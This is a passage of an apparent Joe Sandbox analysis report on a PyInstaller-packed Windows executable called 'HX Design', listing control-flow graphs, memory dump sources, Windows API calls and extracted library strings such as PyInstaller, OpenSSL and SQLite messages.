103->112 113 7ff732063c1e-7ff732063c2c 107->113 114 7ff732063c04-7ff732063c1c 107->114 115 7ff732063c31-7ff732063c40 call 7ff732074f30 108->115 111->102 124 7ff732063b08-7ff732063b0f 111->124 122 7ff732063b7c-7ff732063b80 112->122 123 7ff732063b87-7ff732063b9f call 7ff732075250 112->123 113->115 114->115 125 7ff732063c46-7ff732063c4a 115->125 126 7ff732063d41-7ff732063d63 call 7ff7320644e0 115->126 122->123 135 7ff732063bac-7ff732063bc4 call 7ff732075250 123->135 136 7ff732063ba1-7ff732063ba5 123->136 124->102 128 7ff732063cd4-7ff732063ce6 call 7ff732068830 125->128 129 7ff732063c50-7ff732063c5f call 7ff7320690e0 125->129 138 7ff732063d65-7ff732063d6f call 7ff732064630 126->138 139 7ff732063d71-7ff732063d82 call 7ff732061c80 126->139 144 7ff732063ce8-7ff732063ceb 128->144 145 7ff732063d35-7ff732063d3c 128->145 146 7ff732063cb3-7ff732063cbd call 7ff732068660 129->146 147 7ff732063c61 129->147 135->102 159 7ff732063bc6 135->159 136->135 150 7ff732063d87-7ff732063d96 138->150 139->150 144->145 149 7ff732063ced-7ff732063d10 call 7ff732061c80 144->149 153 7ff732063c68 call 7ff732062710 145->153 164 7ff732063cc8-7ff732063ccf 146->164 165 7ff732063cbf-7ff732063cc6 146->165 147->153 166 7ff732063d2b-7ff732063d33 call 7ff732074f30 149->166 167 7ff732063d12-7ff732063d26 call 7ff732062710 call 7ff732074f30 149->167 156 7ff732063d98-7ff732063d9f 150->156 157 7ff732063dc4-7ff732063dda call 7ff732069390 150->157 160 7ff732063c6d-7ff732063c77 153->160 156->157 162 7ff732063da1-7ff732063da5 156->162 172 7ff732063ddc 157->172 173 7ff732063de8-7ff732063e04 SetDllDirectoryW 157->173 159->102 160->99 162->157 168 7ff732063da7-7ff732063dbe SetDllDirectoryW LoadLibraryExW 162->168 164->150 165->153 166->150 167->160 168->157 172->173 176 7ff732063e0a-7ff732063e19 call 7ff732068830 173->176 177 7ff732063f01-7ff732063f08 173->177 187 7ff732063e1b-7ff732063e21 176->187 188 7ff732063e32-7ff732063e3c call 7ff732074f30 176->188 179 7ff732063f0e-7ff732063f15 177->179 180 7ff732064008-7ff732064010 177->180 179->180 184 7ff732063f1b-7ff732063f25 call 7ff7320633c0 179->184 185 7ff732064035-7ff732064040 call 7ff7320636a0 call 7ff732063360 180->185 186 7ff732064012-7ff73206402f PostMessageW GetMessageW 180->186 184->160 198 7ff732063f2b-7ff732063f3f call 7ff7320690c0 184->198 199 7ff732064045-7ff732064067 call 7ff732063670 call 7ff732066fc0 call 7ff732066d70 185->199 186->185 192 7ff732063e2d-7ff732063e2f 187->192 193 7ff732063e23-7ff732063e2b 187->193 200 7ff732063ef2-7ff732063efc call 7ff732068940 188->200 201 7ff732063e42-7ff732063e48 188->201 192->188 193->192 207 7ff732063f64-7ff732063fa7 call 7ff732068940 call 7ff7320689e0 call 7ff732066fc0 call 7ff732066d70 call 7ff7320688e0 198->207 208 7ff732063f41-7ff732063f5e PostMessageW GetMessageW 198->208 200->177 201->200 205 7ff732063e4e-7ff732063e54 201->205 210 7ff732063e56-7ff732063e58 205->210 211 7ff732063e5f-7ff732063e61 205->211 248 7ff732063fa9-7ff732063fbf call 7ff732068ed0 call 7ff7320688e0 207->248 249 7ff732063ff5-7ff732064003 call 7ff732061900 207->249 208->207 214 7ff732063e67-7ff732063e83 call 7ff732066dc0 call 7ff732067340 210->214 215 7ff732063e5a 210->215 211->177 211->214 227 7ff732063e8e-7ff732063e95 214->227 228 7ff732063e85-7ff732063e8c 214->228 215->177 230 7ff732063e97-7ff732063ea4 call 7ff732066e00 227->230 231 7ff732063eaf-7ff732063eb9 call 7ff7320671b0 227->231 232 7ff732063edb-7ff732063ef0 call 7ff732062a50 call 7ff732066fc0 call 7ff732066d70 228->232 230->231 243 7ff732063ea6-7ff732063ead 230->243 245 7ff732063ebb-7ff732063ec2 231->245 246 7ff732063ec4-7ff732063ed2 call 7ff7320674f0 231->246 232->177 243->232 245->232 246->177 258 7ff732063ed4 246->258 248->249 261 7ff732063fc1-7ff732063fd6 248->261 249->160 258->232 262 7ff732063fd8-7ff732063feb call 7ff732062710 call 7ff732061900 261->262 263 7ff732063ff0 call 7ff732062a50 261->263 262->160 263->249
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                      • Opcode ID: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                                      • Instruction ID: 8f7f528829b4290758f5c6021b6df81c97e115fe6210bf7ae367767ce32e76d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52c1960cc45de78c26c9f57622ace5a14626686e839aa839f1fc42fe00fc1f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D32AB21B08682B5FB18BB3494553BAE6A1EF45B80FC44032DA5D432D6EFACE55CE374
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                                      • API String ID: 0-2781224710
                                                                                                                                                                                                                                                      • Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                      • Instruction ID: f92e3187595c664bf5e741c52d637cb91773cce29525b52e429cb979d1260b06
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37829D21A08A8281FB629B21D4547BEA7A1EF86785F544036DB4D47BFEDF3CE581C311

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 713 7ffdfb2f92b0-7ffdfb2f932f 714 7ffdfb2f9335-7ffdfb2f933f 713->714 715 7ffdfb2f948d-7ffdfb2f94a3 713->715 714->715 716 7ffdfb2f9345-7ffdfb2f9348 714->716 717 7ffdfb2f94a9-7ffdfb2f94af 715->717 718 7ffdfb2f939f-7ffdfb2f93e5 call 7ffdfb2e6180 715->718 716->717 720 7ffdfb2f934e 716->720 717->718 721 7ffdfb2f94b5-7ffdfb2f94cb call 7ffdfb2e6180 717->721 725 7ffdfb2f93eb-7ffdfb2f944f call 7ffdfb41380c 718->725 726 7ffdfb2f9a7e-7ffdfb2f9a81 718->726 723 7ffdfb2f9355-7ffdfb2f935e 720->723 730 7ffdfb2f9ade 721->730 733 7ffdfb2f94d1-7ffdfb2f94ec 721->733 723->723 727 7ffdfb2f9360-7ffdfb2f936f call 7ffdfb2e6180 723->727 741 7ffdfb2f9778-7ffdfb2f9788 725->741 742 7ffdfb2f9455-7ffdfb2f9471 00007FFE1A463010 725->742 729 7ffdfb2f9a83-7ffdfb2f9a8a 726->729 726->730 727->730 743 7ffdfb2f9375-7ffdfb2f938b 00007FFE1A463010 727->743 735 7ffdfb2f9a8c-7ffdfb2f9a96 729->735 736 7ffdfb2f9ad5 729->736 734 7ffdfb2f9ae3-7ffdfb2f9afa 730->734 749 7ffdfb2f9506-7ffdfb2f950d 733->749 750 7ffdfb2f94ee-7ffdfb2f94ff 733->750 739 7ffdfb2f9a98 735->739 740 7ffdfb2f9a9e-7ffdfb2f9acb 735->740 736->730 739->740 740->730 773 7ffdfb2f9acd-7ffdfb2f9ad3 740->773 747 7ffdfb2f96cf-7ffdfb2f96f4 741->747 745 7ffdfb2f962b 742->745 746 7ffdfb2f9477-7ffdfb2f9488 00007FFE1A463010 742->746 748 7ffdfb2f9390-7ffdfb2f9397 743->748 751 7ffdfb2f962e-7ffdfb2f9677 00007FFE1A463010 * 2 745->751 746->751 754 7ffdfb2f96fa-7ffdfb2f96ff 747->754 755 7ffdfb2f982f 747->755 748->748 756 7ffdfb2f9399 748->756 752 7ffdfb2f9510-7ffdfb2f9517 749->752 750->749 757 7ffdfb2f9679-7ffdfb2f9680 751->757 758 7ffdfb2f96cd 751->758 752->752 760 7ffdfb2f9519-7ffdfb2f9520 752->760 754->755 761 7ffdfb2f9705-7ffdfb2f9731 call 7ffdfb2effd0 754->761 759 7ffdfb2f9834-7ffdfb2f9842 755->759 756->718 762 7ffdfb2f976a-7ffdfb2f9773 757->762 763 7ffdfb2f9686-7ffdfb2f9690 757->763 758->747 764 7ffdfb2f9845-7ffdfb2f9848 759->764 765 7ffdfb2f9527-7ffdfb2f952e 760->765 767 7ffdfb2f9734-7ffdfb2f9754 761->767 762->758 768 7ffdfb2f9698-7ffdfb2f96c5 763->768 769 7ffdfb2f9692 763->769 770 7ffdfb2f98fb-7ffdfb2f9905 764->770 771 7ffdfb2f984e-7ffdfb2f9869 call 7ffdfb2f8830 764->771 765->765 772 7ffdfb2f9530-7ffdfb2f9547 765->772 774 7ffdfb2f982a-7ffdfb2f982d 767->774 775 7ffdfb2f975a-7ffdfb2f9764 767->775 768->758 814 7ffdfb2f96c7 768->814 769->768 780 7ffdfb2f9907-7ffdfb2f9910 770->780 781 7ffdfb2f9913-7ffdfb2f9926 call 7ffdfb2f46f0 770->781 771->770 795 7ffdfb2f986f-7ffdfb2f98f3 771->795 777 7ffdfb2f9549 772->777 778 7ffdfb2f9597-7ffdfb2f959e 772->778 773->730 774->764 782 7ffdfb2f9766-7ffdfb2f9768 775->782 783 7ffdfb2f978d-7ffdfb2f9790 775->783 785 7ffdfb2f9550-7ffdfb2f9557 777->785 787 7ffdfb2f95c2-7ffdfb2f95c9 778->787 788 7ffdfb2f95a0-7ffdfb2f95a7 778->788 780->781 799 7ffdfb2f992c-7ffdfb2f9936 781->799 800 7ffdfb2f9a70-7ffdfb2f9a7c 781->800 794 7ffdfb2f9792-7ffdfb2f979a 782->794 783->794 796 7ffdfb2f9560-7ffdfb2f9569 785->796 792 7ffdfb2f95cb-7ffdfb2f95d5 787->792 793 7ffdfb2f961a 787->793 788->718 797 7ffdfb2f95ad-7ffdfb2f95bc call 7ffdfb3a5ae0 788->797 801 7ffdfb2f95d7 792->801 802 7ffdfb2f95dd-7ffdfb2f960a 792->802 816 7ffdfb2f9623-7ffdfb2f9626 793->816 806 7ffdfb2f979c-7ffdfb2f97b0 call 7ffdfb2f7c00 794->806 807 7ffdfb2f97be-7ffdfb2f97d4 call 7ffdfb3a6ad0 794->807 820 7ffdfb2f9959-7ffdfb2f995f 795->820 821 7ffdfb2f98f5 795->821 796->796 803 7ffdfb2f956b-7ffdfb2f9579 796->803 797->718 797->787 810 7ffdfb2f9938 799->810 811 7ffdfb2f993e-7ffdfb2f9951 799->811 800->734 801->802 802->816 837 7ffdfb2f960c-7ffdfb2f9615 802->837 813 7ffdfb2f9580-7ffdfb2f9589 803->813 806->807 830 7ffdfb2f97b2-7ffdfb2f97b7 806->830 825 7ffdfb2f97d6-7ffdfb2f97eb call 7ffdfb35df90 807->825 826 7ffdfb2f97ed 807->826 810->811 811->820 813->813 822 7ffdfb2f958b-7ffdfb2f9595 813->822 814->758 816->734 828 7ffdfb2f9988-7ffdfb2f9998 820->828 829 7ffdfb2f9961-7ffdfb2f9984 820->829 821->770 822->778 822->785 832 7ffdfb2f97ef-7ffdfb2f97f4 825->832 826->832 840 7ffdfb2f999a 828->840 841 7ffdfb2f99a0-7ffdfb2f99d1 828->841 829->828 830->807 835 7ffdfb2f97f6-7ffdfb2f980c call 7ffdfb3a6ad0 832->835 836 7ffdfb2f9822-7ffdfb2f9828 832->836 835->774 847 7ffdfb2f980e-7ffdfb2f9820 call 7ffdfb35df90 835->847 836->759 837->734 840->841 842 7ffdfb2f99e4-7ffdfb2f99eb 841->842 843 7ffdfb2f99d3-7ffdfb2f99e2 841->843 846 7ffdfb2f99ef-7ffdfb2f9a11 call 7ffdfb2f7c00 842->846 843->846 852 7ffdfb2f9a19-7ffdfb2f9a1c 846->852 853 7ffdfb2f9a13-7ffdfb2f9a17 846->853 847->774 847->836 855 7ffdfb2f9a23 852->855 856 7ffdfb2f9a1e-7ffdfb2f9a21 852->856 854 7ffdfb2f9a27-7ffdfb2f9a39 853->854 857 7ffdfb2f9a3b-7ffdfb2f9a42 854->857 858 7ffdfb2f9a44-7ffdfb2f9a56 854->858 855->854 856->854 856->855 859 7ffdfb2f9a5a-7ffdfb2f9a6e 857->859 858->859 859->734
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                      • API String ID: 4225454184-4201244970
                                                                                                                                                                                                                                                      • Opcode ID: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
                                                                                                                                                                                                                                                      • Instruction ID: 8d381b69deac3cdf89acc5ca1947a81b06f414ea14b30d98fd1cb5f1c99ccf0f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1f561667bbe6322790191b89becdf0bea67dc52a5ba2455568e19f1d4293569
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA326B22B0A683C6EB659F25D560BB93BA1FB45B98F044234CA6E477ECDF3CE5558300

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 861 7ff732085c00-7ff732085c3b call 7ff732085588 call 7ff732085590 call 7ff7320855f8 868 7ff732085e65-7ff732085eb1 call 7ff73207a900 call 7ff732085588 call 7ff732085590 call 7ff7320855f8 861->868 869 7ff732085c41-7ff732085c4c call 7ff732085598 861->869 894 7ff732085eb7-7ff732085ec2 call 7ff732085598 868->894 895 7ff732085fef-7ff73208605d call 7ff73207a900 call 7ff732081578 868->895 869->868 874 7ff732085c52-7ff732085c5c 869->874 876 7ff732085c7e-7ff732085c82 874->876 877 7ff732085c5e-7ff732085c61 874->877 880 7ff732085c85-7ff732085c8d 876->880 879 7ff732085c64-7ff732085c6f 877->879 882 7ff732085c7a-7ff732085c7c 879->882 883 7ff732085c71-7ff732085c78 879->883 880->880 884 7ff732085c8f-7ff732085ca2 call 7ff73207d5fc 880->884 882->876 886 7ff732085cab-7ff732085cb9 882->886 883->879 883->882 892 7ff732085cba-7ff732085cc6 call 7ff73207a948 884->892 893 7ff732085ca4-7ff732085ca6 call 7ff73207a948 884->893 902 7ff732085ccd-7ff732085cd5 892->902 893->886 894->895 904 7ff732085ec8-7ff732085ed3 call 7ff7320855c8 894->904 915 7ff73208606b-7ff73208606e 895->915 916 7ff73208605f-7ff732086066 895->916 902->902 905 7ff732085cd7-7ff732085ce8 call 7ff732080474 902->905 904->895 913 7ff732085ed9-7ff732085efc call 7ff73207a948 GetTimeZoneInformation 904->913 905->868 914 7ff732085cee-7ff732085d44 call 7ff73208a4d0 * 4 call 7ff732085b1c 905->914 931 7ff732085fc4-7ff732085fee call 7ff732085580 call 7ff732085570 call 7ff732085578 913->931 932 7ff732085f02-7ff732085f23 913->932 973 7ff732085d46-7ff732085d4a 914->973 920 7ff7320860a5-7ff7320860b8 call 7ff73207d5fc 915->920 921 7ff732086070 915->921 919 7ff7320860fb-7ff7320860fe 916->919 922 7ff732086104-7ff73208610c call 7ff732085c00 919->922 923 7ff732086073 919->923 936 7ff7320860ba 920->936 937 7ff7320860c3-7ff7320860de call 7ff732081578 920->937 921->923 927 7ff732086078-7ff7320860a4 call 7ff73207a948 call 7ff73206c550 922->927 923->927 928 7ff732086073 call 7ff732085e7c 923->928 928->927 938 7ff732085f2e-7ff732085f35 932->938 939 7ff732085f25-7ff732085f2b 932->939 943 7ff7320860bc-7ff7320860c1 call 7ff73207a948 936->943 956 7ff7320860e5-7ff7320860f7 call 7ff73207a948 937->956 957 7ff7320860e0-7ff7320860e3 937->957 945 7ff732085f49 938->945 946 7ff732085f37-7ff732085f3f 938->946 939->938 943->921 951 7ff732085f4b-7ff732085fbf call 7ff73208a4d0 * 4 call 7ff732082b5c call 7ff732086114 * 2 945->951 946->945 955 7ff732085f41-7ff732085f47 946->955 951->931 955->951 956->919 957->943 975 7ff732085d4c 973->975 976 7ff732085d50-7ff732085d54 973->976 975->976 976->973 978 7ff732085d56-7ff732085d7b call 7ff732076b58 976->978 984 7ff732085d7e-7ff732085d82 978->984 986 7ff732085d84-7ff732085d8f 984->986 987 7ff732085d91-7ff732085d95 984->987 986->987 989 7ff732085d97-7ff732085d9b 986->989 987->984 992 7ff732085d9d-7ff732085dc5 call 7ff732076b58 989->992 993 7ff732085e1c-7ff732085e20 989->993 1001 7ff732085dc7 992->1001 1002 7ff732085de3-7ff732085de7 992->1002 995 7ff732085e27-7ff732085e34 993->995 996 7ff732085e22-7ff732085e24 993->996 998 7ff732085e36-7ff732085e4c call 7ff732085b1c 995->998 999 7ff732085e4f-7ff732085e5e call 7ff732085580 call 7ff732085570 995->999 996->995 998->999 999->868 1005 7ff732085dca-7ff732085dd1 1001->1005 1002->993 1007 7ff732085de9-7ff732085e07 call 7ff732076b58 1002->1007 1005->1002 1008 7ff732085dd3-7ff732085de1 1005->1008 1013 7ff732085e13-7ff732085e1a 1007->1013 1008->1002 1008->1005 1013->993 1014 7ff732085e09-7ff732085e0d 1013->1014 1014->993 1015 7ff732085e0f 1014->1015 1015->1013
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085C45
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A909
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A92E
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085C34
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EAA
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EBB
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085ECC
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                      • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                      • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                      • Instruction ID: 8afa3c6fb46f86bfbe3d2fda8b234fdb1bc88e3c05afed86e31a574ae7926d18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54D1F632A0824266E720FF65D4911BAEB91FF84784FC54035DE0D47696DFBCE449E760

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1136 7ff732086964-7ff7320869d7 call 7ff732086698 1139 7ff7320869d9-7ff7320869e2 call 7ff732074ee8 1136->1139 1140 7ff7320869f1-7ff7320869fb call 7ff732078520 1136->1140 1145 7ff7320869e5-7ff7320869ec call 7ff732074f08 1139->1145 1146 7ff7320869fd-7ff732086a14 call 7ff732074ee8 call 7ff732074f08 1140->1146 1147 7ff732086a16-7ff732086a7f CreateFileW 1140->1147 1161 7ff732086d32-7ff732086d52 1145->1161 1146->1145 1148 7ff732086afc-7ff732086b07 GetFileType 1147->1148 1149 7ff732086a81-7ff732086a87 1147->1149 1155 7ff732086b5a-7ff732086b61 1148->1155 1156 7ff732086b09-7ff732086b44 GetLastError call 7ff732074e7c CloseHandle 1148->1156 1152 7ff732086ac9-7ff732086af7 GetLastError call 7ff732074e7c 1149->1152 1153 7ff732086a89-7ff732086a8d 1149->1153 1152->1145 1153->1152 1158 7ff732086a8f-7ff732086ac7 CreateFileW 1153->1158 1162 7ff732086b69-7ff732086b6c 1155->1162 1163 7ff732086b63-7ff732086b67 1155->1163 1156->1145 1171 7ff732086b4a-7ff732086b55 call 7ff732074f08 1156->1171 1158->1148 1158->1152 1165 7ff732086b6e 1162->1165 1166 7ff732086b72-7ff732086bc7 call 7ff732078438 1162->1166 1163->1166 1165->1166 1174 7ff732086bc9-7ff732086bd5 call 7ff7320868a0 1166->1174 1175 7ff732086be6-7ff732086c17 call 7ff732086418 1166->1175 1171->1145 1174->1175 1181 7ff732086bd7 1174->1181 1182 7ff732086c1d-7ff732086c5f 1175->1182 1183 7ff732086c19-7ff732086c1b 1175->1183 1186 7ff732086bd9-7ff732086be1 call 7ff73207aac0 1181->1186 1184 7ff732086c81-7ff732086c8c 1182->1184 1185 7ff732086c61-7ff732086c65 1182->1185 1183->1186 1188 7ff732086c92-7ff732086c96 1184->1188 1189 7ff732086d30 1184->1189 1185->1184 1187 7ff732086c67-7ff732086c7c 1185->1187 1186->1161 1187->1184 1188->1189 1191 7ff732086c9c-7ff732086ce1 CloseHandle CreateFileW 1188->1191 1189->1161 1193 7ff732086d16-7ff732086d2b 1191->1193 1194 7ff732086ce3-7ff732086d11 GetLastError call 7ff732074e7c call 7ff732078660 1191->1194 1193->1189 1194->1193
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
